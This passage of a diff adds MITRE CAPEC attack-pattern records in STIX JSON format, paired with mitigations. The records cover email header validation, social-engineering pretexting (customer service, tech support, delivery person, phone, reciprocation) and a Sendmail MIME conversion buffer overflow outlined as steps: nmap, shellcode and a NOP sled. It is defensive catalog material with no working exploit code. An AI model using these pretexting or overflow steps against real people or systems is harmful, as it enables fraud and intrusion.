", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This attack targets most widely deployed feature rich email applications, including web based email programs." + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform validation on email header data", + "id": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc743c69-d4ac-4767-91af-c4ef9e82f50a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement email filtering solutions on mail server or on MTA, relay server.", + "id": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78fc3fe0-3e55-40a5-af05-614cea38688b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cba6ee4-dbac-4c77-8236-a6fcf7036196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.", + "external_references": [ + { + "external_id": "CAPEC-410", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/410.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Information Elicitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.", + "external_references": [ + { + "external_id": "CAPEC-412", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/412.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Customer Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.", + "external_references": [ + { + "external_id": "CAPEC-413", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/413.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Tech Support", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and \"deliveries\" in order to be able to pull it off.", + "external_references": [ + { + "external_id": "CAPEC-414", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/414.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Delivery Person", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.", + "external_references": [ + { + "external_id": "CAPEC-415", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/415.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Pretexting via Phone", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_domains": [ + "Social Engineering", + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary's interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary's speech and thought patterns.", + "external_references": [ + { + "external_id": "CAPEC-416", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/416.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Manipulate Human Behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--756dbec1-5182-44f6-a59e-093c4b3f451e", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "target_ref": "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses social engineering to exploit the target's perception of the relationship between the adversary and themselves. This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-417", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/417.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "There are no necessary resources required for this attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.", + "id": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-417-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f1bc7a7-fc63-4847-b2bf-ad73c7d19b20", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate pattern.", + "external_references": [ + { + "external_id": "CAPEC-419", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/419.html" + } + ], + "id": "attack-pattern--c5724646-0a5b-4b60-b0e2-6c445a744628", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Perception of Concession", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.", + "external_references": [ + { + "external_id": "CAPEC-42", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/42.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "CERT Advisory CA-1997-05 MIME Conversion Buffer Overflow in Sendmail Versions 8.8.3 and 8.8.4, Software Engineering Institute: Carnegie Mellon University", + "external_id": "REF-364", + "source_name": "reference_from_CAPEC", + "url": "http://www.cert.org/advisories/CA-1997-05.html" + } + ], + "id": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "MIME Conversion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.\n Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.See also: CVE-1999-0047" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target mail server: The adversary identifies a target mail server that they wish to attack.

    2. Techniques
    Use Nmap on a system to identify a mail server service.

  2. Determine viability of attack: Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4).

Experiment

  1. Find injection vector: Identify places in the system where vulnerable MIME conversion routines may be used.

  2. Craft overflow content: The adversary crafts e-mail messages with special headers that will cause a buffer overflow for the vulnerable MIME conversion routine. The intent of this attack is to leverage the overflow for execution of arbitrary code and gain access to the mail server machine, so the adversary will craft an email that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target system uses a mail server.", + "Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system." + ], + "x_capec_skills_required": { + "High": "Causing arbitrary code to execute on the target system.", + "Low": "It may be trivial to cause a DoS via this attack pattern" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Stay up to date with third party vendor patches", + "id": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b0ebb42-718a-4b46-8ffb-8ce77603ff60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6db12259-6932-4e8f-9abb-ef1ac7a34727", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "id": "course-of-action--d30a8d26-316b-40c2-962a-2bd36e335124", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8c0ae8f-535b-4df1-acd4-86068f0f66d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d30a8d26-316b-40c2-962a-2bd36e335124", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use the sendmail restricted shell program (smrsh)", + "id": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": 